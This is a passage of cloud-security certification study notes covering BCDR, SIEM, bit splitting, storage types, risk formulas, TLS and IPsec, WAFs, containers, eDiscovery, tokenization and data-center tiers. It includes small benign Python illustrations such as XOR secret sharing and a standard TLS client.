Shares are used to allocate resources among all tenants whenever the number of resource requests exceeds the number of available resources. Reservations are used to guarantee a customer a minimum amount of resources, while limits are used to set a maximum resource allocation for a tenant.

BCDR (Business Continuity and Disaster Recovery)

Should be tested annually at a minimum.
The BCDR planning process should be cyclical, with no beginning and no end. However, initially the process should begin with defining the plan's scope, then gathering requirements, and then analyzing them. Then the relevant risks should be assessed. Only after that should the actual designing of the plan take place, followed by its implementation. Once the plan has been implemented, it should be tested, a report should be produced with the results of the testing, and then, as the last phase of the cycle, the plan may need to be revised in order to address any discovered deficiencies. This begins a new iteration, back to defining the scope.
Define the scope > gather requirements > analyze > assess risks > design > implement > test > report > revise the plan.

SIEM (Security Information and Event Management)

Software that can be configured to evaluate data logs from IDS, IPS, firewalls, and proxy servers in order to detect significant events that require the attention of IT staff according to predefined rules. Common capabilities are as follows: 1. Aggregation 2. Alerting 3. Correlation

Bit Splitting

Splitting up and storing encrypted information across different cloud storage services.
Methods:
Secret Sharing Made Short (SSMS):
1. Encrypt the information
2. Split the encrypted information using an Information Dispersal Algorithm (IDA)
3. Split the encryption key using a secret sharing algorithm
All-or-Nothing Transform with Reed-Solomon (AONT-RS):
1. Integrates AONT and erasure coding (parity)
a. Encrypts and transforms the information and the encryption key into blocks
b. Uses an IDA to split the blocks into 'm' shares, which are distributed
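This is not SSMS or AONT-RS themselves, but a sketch of the underlying idea using simple XOR shares: the secret is only recoverable when all shares are combined, so no single cloud store holds usable data.

```python
# Sketch of the bit-splitting idea with XOR shares: reconstruction requires
# every share, so a single provider holding one share learns nothing useful.
import os

def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def split(secret: bytes, n_shares: int) -> list[bytes]:
    shares = [os.urandom(len(secret)) for _ in range(n_shares - 1)]
    last = secret
    for s in shares:
        last = xor_bytes(last, s)
    return shares + [last]

def combine(shares: list[bytes]) -> bytes:
    out = shares[0]
    for s in shares[1:]:
        out = xor_bytes(out, s)
    return out

shares = split(b"cloud secret", 3)   # store each share with a different provider
print(combine(shares))               # b'cloud secret' only when all shares are present
```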

Static Vs Dynamic Masking

Static masking is the best type of masking to use in a development environment that requires data similar to production data. Dynamic masking is best for use in production environments.

Storage Type

Structured:
>> Well-suited for databases.
>> Data is stored in volumes and blocks.
>> The file or data is split into equal-sized pieces (blocks).
>> A block can be located but does not have associated metadata with it.
---------------------------------
Unstructured:
>>> A set of files. <<<
>>> Object storage. <<<
>> Storage of one piece of data at a time; each object could be a file, video, picture, etc.
>> Object storage is not hierarchical storage like file storage (see volume storage).
>> Each object is stored with metadata and a unique identifier that allow it to be located.
-------------------------------------
Object:
>> Object storage is often used for storing VM images and allows you to pay for exactly what you use. It is used for storing files, but as generic objects, without an underlying file system and without a hierarchy of folders. The objects are usually organized into groups and, within each group, form a flat namespace. Each object is assigned a unique key, which is used for accessing the object. The objects can usually be accessed programmatically by using the appropriate application programming interfaces (APIs) or web-based calls, such as HTTP GET requests. Object storage is a serverless storage service: customers are completely shielded from the underlying physical infrastructure and, for the most part, from the logical infrastructure as well. For example, you can create a storage account of the type that supports object storage, you can create containers for the objects, and you can populate those containers and manage their contents, but you cannot specify any servers, physical or virtual, that would host the objects in your storage account.
Volume:
Must be attached to a virtual machine with an OS. It is block-level storage and requires that you pay for a block, or volume, of storage even though you may not use the entire volume. The volume appears as a regular local hard disk: you can partition it, format the partitions with a file system, and populate them with files organized into a hierarchy of folders.
========================
PaaS models use:
1. Structured (block)
2. Unstructured (blob)
IaaS models use:
1. Object (unstructured)
2. Volume (structured)
SaaS models use:
1. Information storage and management
2. Content and file storage
3. SaaS storage is usually obfuscated from the users.

Risk Assessment Methods

There are two types:
Quantitative - used to assess the monetary impact of specific threat events; uses formulas to calculate the monetary impact:
SLE = Asset Value (AV) x Exposure Factor (EF)
ALE = SLE x Annual Rate of Occurrence (ARO)
Qualitative - used to assess the level of priority a threat should be assigned, e.g., what is the damage to your reputation.
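The quantitative formulas worked through with hypothetical numbers:

```python
# SLE = AV * EF, ALE = SLE * ARO. All values are illustrative only.
asset_value = 200_000              # AV: value of the asset, in dollars
exposure_factor = 0.25             # EF: fraction of the asset lost in one incident
annual_rate_of_occurrence = 0.5    # ARO: expected incidents per year (one every two years)

single_loss_expectancy = asset_value * exposure_factor                           # SLE = 50,000
annualized_loss_expectancy = single_loss_expectancy * annual_rate_of_occurrence  # ALE = 25,000

print(f"SLE = ${single_loss_expectancy:,.0f}")
print(f"ALE = ${annualized_loss_expectancy:,.0f}")
```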

TPM (ISO 11889)

Trusted Platform Module: a secure microcontroller that validates a system's integrity by physically and logically protecting credentials.

Shibboleth Standard

User authenticates with their organization's credentials and the organization (Identity Provider) passes information to service providers.

Encryption of Data in Transit

A VPN uses SSH, TLS, or IPsec to encrypt and transmit the data.
----------------------
SSH: Secure Shell, Layer 5. Computer to computer; perfect for administrative connections to routers, switches, servers, etc.
==============================
TLS: provides confidentiality and integrity. Commonly used to secure HTTP traffic. TLS uses asymmetric cryptography (the handshake) to exchange a secret key, and symmetric cryptography (the record protocol) to exchange the data.
In any communication between two computers, one acts as a client and the other acts as a server. >>A client always initiates<< communication, and a server always responds to the client's initial request.
TLS includes two protocols:
1. Handshake
2. Record
During the handshake phase, a client and a server negotiate the technical specifics, such as a TLS version and an encryption algorithm, and generate a session key. A handshake begins when a client sends a message to the server that contains a random string of data and information about the TLS versions and encryption algorithms that the client supports. The server indicates the version of TLS and the encryption algorithm that the server has chosen; the message also includes the server's certificate, the associated public key, and another random string of data. The client verifies the server's certificate, thereby confirming the server's identity. Then the client generates another random string of data, known as a premaster secret, and encrypts it with the server's public key. The server decrypts the premaster secret with its private key. Finally, both the client and the server independently generate a session key from the client's random string, the server's random string, and the premaster secret. Because they both use the same algorithm, they arrive at the same result: the symmetric encryption session key.
During the record phase, the client and the server exchange data, which is the ultimate goal of their interaction.
TLS uses X.509 v3 certificates for authentication. The certificates are sometimes also referred to as PKI certificates because they are intended for so-called public key cryptography. In a client/server session, only the server must have a TLS certificate; the client's certificate is optional. The exact steps in a TLS interaction can vary somewhat, depending on the TLS version and cipher suite that the client and server use.
==================================
IPsec:
> A Layer 3 protocol that defines the encryption, authentication, and key management for TCP/IP transmissions.
> IPsec is an enhancement to IPv4 and is native to IPv6.
> IPsec is unique among authentication methods in that it adds security information to the header of all IP packets.
IPsec can use two security protocols:
1. Authentication Header (AH): provides integrity.
2. Encapsulating Security Payload (ESP): provides confidentiality.
Tunnel mode (hides everything): both the header and the data get encrypted by ESP. Tunnel mode is usually used for site-to-site VPNs across the Internet.
Transport mode (hides the data, shows the header): only the payload portion is encrypted.
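A minimal sketch of a TLS client using Python's standard ssl module; the handshake described above (version/cipher negotiation, certificate verification, session-key agreement) happens inside wrap_socket. The hostname is only an example, and running this requires network access.

```python
# Sketch of a TLS client connection: the handshake is performed by wrap_socket,
# after which data exchanged over tls_sock uses the negotiated session key.
import socket
import ssl

hostname = "www.example.com"                     # example host only
context = ssl.create_default_context()           # verifies the server certificate chain

with socket.create_connection((hostname, 443), timeout=10) as raw_sock:
    with context.wrap_socket(raw_sock, server_hostname=hostname) as tls_sock:
        print(tls_sock.version())                # e.g. 'TLSv1.3'
        print(tls_sock.cipher())                 # negotiated cipher suite
        print(tls_sock.getpeercert()["subject"]) # verified server identity
```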

WAF (Web Application Firewall)

A WAF is a firewall that filters, monitors, and blocks HTTP traffic to and from a web application; this differs from a regular firewall in that the WAF is able to filter the content of specific web applications. A WAF operates at Layer 7: it accepts only HTTP traffic, inspects it, and blocks any discovered attacks. A WAF understands HTTP and can detect common attack types, such as cross-site scripting (XSS), cross-site request forgery (CSRF), and SQL injection. A WAF should be positioned between a perimeter firewall and the web server(s) that the WAF is supposed to protect. All HTTP traffic intended for those servers should be directed to the WAF, which will forward legitimate inbound HTTP traffic to the web servers and filter out what it determines to be malicious traffic.

Zero Trust Architecture (ZTA)

Zero Trust Architecture relies on the principle of "trust no one."

Containers

A type of virtualization that allows for shared operating systems for more resource savings and faster execution. A container is a special computing environment that is somewhat isolated from the rest of the software running on its hosting server. The general idea behind containers is that an application or service can be packaged along with all of its dependencies into an image and deployed to almost any environment, where it can run independently of any other containers or installed applications. Most containers are Linux-based and therefore need an underlying Linux OS with a kernel that is compatible with the containers' software components. Docker, which is a platform for creating and hosting containers, is available in different implementations intended for different host OSs. When you install Docker on a Windows-based server, it quietly creates a Linux-based Hyper-V VM and runs Linux-based containers in that VM, thereby creating an illusion that the same container can run on different host OSs. A similar model is used to run Windows-based containers on Linux servers, as well as in some other situations where a container is not directly compatible with the host OS's kernel. Simply put, containers can run on both Windows and Linux, even though containers are mostly Linux-based; the OS does not need to match because the container can be run inside a guest OS in a virtual machine. Containers are particularly useful in multi-cloud and hybrid deployments.

Footprinting

Also known as reconnaissance, footprinting is the process of gathering information about a potential target of an attack. DNS footprinting refers to learning all the records in a DNS zone. Considering that DNS on the Internet is essentially a public service, it is next to impossible to prevent DNS footprinting. DNSSEC is intended to prevent unauthorized changes to DNS data but does not restrict read access to it and, therefore, cannot prevent DNS footprinting.

Kubernetes

An open source system for automating the deployment, scaling, and management of containerized applications. Kubernetes is a container orchestration system.

NFPA (National Fire Protection Association)

An organization dedicated to establishing fire safety standards for all public sectors, including healthcare. NFPA is an international nonprofit organization; among other documents, it publishes standards pertaining to building design in general and fire safety in particular for various types of buildings, including data centers. FM-200 is a fire-suppressant agent: a colorless, nontoxic gas that does not leave any film or residue and does not harm the environment. Halon is a fire-suppressant agent; it was widely used in the past, but its production and import were banned in 1994 because it destroys Earth's ozone layer. Ionization is a physical phenomenon that involves the transformation of electrically neutral molecules into electrically charged ions; one of the two common types of smoke detectors is based on ionization produced by a small piece of radioactive material. The other type of smoke detector uses the photoelectric effect -- the ability of certain materials to produce an electric current when they are illuminated by light.

eDiscovery vs Legal Hold

eDiscovery is more focused on the process of forensically collecting, securing, and analyzing data that comes out of a legal hold notice. Legal hold is the actual process of preserving the requested data. The responding party is the person or group who receives an eDiscovery order and is responsible for providing digital evidence.
Data discovery methods:
1. Labels
2. Content
3. Metadata
eDiscovery process:
1. Identification - the scope of what you are collecting
2. Preservation - data identified as potentially relevant is placed in a legal hold
3. Collection - transfer of data from the company to legal counsel
4. Processing - preparation for loading into a document review platform
5. Review - documents are reviewed for responsiveness to discovery requests
6. Production - documents are turned over to opposing counsel
7. Presentation - documents are displayed before audiences
ISO/IEC standards related to forensics:
27037 - Guidelines for identification, collection, acquisition, and preservation of digital evidence
27041 - Guidance on assuring the suitability and adequacy of incident investigation methods
27042 - Guidelines for the analysis and interpretation of digital evidence
27043 - Incident investigation principles and processes
27050 - Electronic discovery (eDiscovery)

Basic Storage Encryption

The encryption engine is located at the management level, and the CSP holds the keys. Protects from hardware theft or loss. Does not protect from a CSP admin accessing the data (since the CSP holds the keys).

Architecture, Threat, Attack Surfaces, and Mitigations (ATASM)

A threat-modeling approach that highlights the importance of a structural understanding of a system for the purpose of threat modeling. The architecture is broken apart into its logical and functional components (decomposing and factoring) to discover all potentially attackable surfaces (inputs and outputs of the system). Decomposition is also used to define those points at which defenses will be built (mitigations are placed at defensible boundaries).

Tokenization

It involves replacing sensitive data with opaque tokens and mapping those tokens back to the original data so that the original data can be restored when necessary. Requires two separate databases that mirror the original database and are mapped to the original data using a tokenization engine.
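A toy sketch of a tokenization engine: sensitive values are replaced with opaque random tokens, and a separate vault (an in-memory dict here, standing in for the isolated mapping database) restores the originals on demand. The card number is a test value.

```python
# Sketch of tokenization: opaque random tokens outward, a separate vault
# holding the token-to-original mapping.
import secrets

class TokenVault:
    def __init__(self):
        self._vault = {}                      # token -> original, kept separately

    def tokenize(self, value: str) -> str:
        token = "tok_" + secrets.token_hex(8)
        self._vault[token] = value
        return token

    def detokenize(self, token: str) -> str:
        return self._vault[token]

vault = TokenVault()
token = vault.tokenize("4111 1111 1111 1111")   # test card number
print(token)                    # opaque value, safe to store in the main database
print(vault.detokenize(token))  # original restored only via the vault
```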

Public Cloud

Public clouds most often have the highest levels of availability among the various cloud deployment models because they tend to be large infrastructures with geographically dispersed resources.

VM Sprawl

occurs when an organization has many VMs that aren't managed properly VM sprawl is the uncontrolled growth of virtual machines to the point where the cloud administrator can no longer effectively manage and secure them.

IDS and IPS appliances

Operate using deep packet analysis; cannot examine encrypted traffic. Operate via signature-based or anomaly detection methods. Known for false positives when they're first installed. The main difference between them is that the primary purpose of an IDS is merely to notify IT personnel of any detected suspicious activity, whereas an IPS is also supposed to actively prevent attacks from happening or to disrupt them. IDS and IPS can analyze traffic at Layer 7. An IPS can detect attacks based on the signatures of known types of attacks, past behaviors on the network, and other factors that an IT administrator might specify in the IPS rules.

Data Custodian

the CSP is typically the data custodian, AKA data processor. They are generally the party that technically stores, handles, and moves the data on behalf of the data owner.

Dynamic Optimization

The automated process of reallocating cloud resources to ensure that no physical resources become over- or under-utilized. Dynamic optimization is the automated process of ensuring that resources are used efficiently and remain highly available.

ITIL (IT Infrastructure Library)

The framework that focuses on IT service management expertise; closely aligns with ISO 20000-1.
ITIL practices (12):
1. Availability management
2. Capacity management
3. Change management
4. Configuration management
5. Continual service improvement management
6. Continuity management
7. Deployment management
8. Incident management
9. Information security management
10. Problem management
11. Release management
12. Service level management
Problem management involves constantly monitoring and analyzing the environment with the goal of anticipating potential problems and taking the necessary steps to prevent them from happening. Once a problem that affects or can affect the service has occurred, it is referred to as an incident and is addressed in accordance with the processes outlined in the incident management component.

Escalation of privilege Attack

This is the type of attack in which a perpetrator attempts to acquire more authority than he or she should normally have, or than he or she has already managed to acquire in an earlier phase of the attack. Technical controls can prevent escalation of privilege. This type of risk can usually be reduced through more thorough access control, more stringent authentication requirements for high-privilege operations, detailed logging and regular log reviews by trained security administrators, and monitoring logs with an automated analytics solution.

VM Introspection (VMI)

Tools that can be used to capture the running memory of a virtual machine currently running on a hypervisor. Uses tools installed on the hypervisor to retrieve pages of memory for analysis. It allows cloud providers to monitor their guest OSs during runtime.

Uptime Institute

The Uptime Institute is a professional services organization that has created a four-tier data-center certification standard. Each tier defines criteria for the basic aspects of data centers, such as power, cooling, maintenance, and fault tolerance. The higher the tier, the more reliable the data center:
Tier 1: Basic
* Suitable for a typical office environment
* Must be shut down for maintenance
* Can withstand brief power outages
* 99.671% uptime
* No redundancy needed
* 28.8 hours of downtime per year
Tier 2: Redundant capacity components
* Can support a critical environment
* Some maintenance can be done without disruption
* Has a better tolerance for utility outages
* 99.749% uptime
* Partial redundancy in power and cooling
* Up to 22 hours of downtime per year
Tier 3: Concurrently maintainable
* Suitable for financial institutions; pieces of equipment are hot-swappable
* Can support a critical environment
* Need not be shut down for maintenance
* Has a better tolerance for utility outages
* No more than 1.6 hours of downtime per year
* 99.982% uptime
* N+1 fault tolerance providing at least 72 hours of outage protection
Tier 4: Fault-tolerant
* Can support a life-critical environment
* Need not be shut down for maintenance
* Can withstand a range of equipment failures
* Fully redundant data center
* 99.995% uptime per year
* 2N+1 fully redundant infrastructure
* 96 hours of power outage protection
* 26.3 minutes of annual downtime
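A quick check of how the tier uptime percentages translate into annual downtime (the figures match those listed above):

```python
# Annual downtime implied by each tier's uptime percentage (8,760 hours/year).
HOURS_PER_YEAR = 365 * 24

for tier, uptime_pct in [("Tier 1", 99.671), ("Tier 2", 99.749),
                         ("Tier 3", 99.982), ("Tier 4", 99.995)]:
    downtime_hours = HOURS_PER_YEAR * (1 - uptime_pct / 100)
    print(f"{tier}: {uptime_pct}% uptime = about {downtime_hours:.1f} hours down per year")
```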

Resource Contention

When there are too many requests and not enough resources available to satisfy them.

Resource Exhaustion

When too many requests are sent in a short period of time, exhausting the available resources.

X.500 vs X.509

X.500 - directory services standard
X.509 - PKI certificates (public and private keys)

DevOps (Development and Operations)

• Decreases the deployment time for newly developed applications and maximizes profit by rapidly addressing market opportunities and getting customer feedback in a timely manner.
• Development and operations work in parallel streams within a DevOps culture.
• A model for accelerated software development and deployment.
DevOps is a concept that refers to a software development and delivery model. Under the traditional model, a team of developers creates an application, and an operations team deploys it into production and subsequently installs updates and performs other types of maintenance. Under the DevOps model, a joint team of developers and operations personnel implements virtually continuous delivery of the software. This is accomplished through the automation of most of the process and close collaboration between the development and operations personnel. DevOps features the agile development style, with short cycles and frequent updates. When security is considered from the very beginning of the development process rather than added at the end of the cycle, the approach is referred to as DevSecOps (see the DevSecOps entry above).

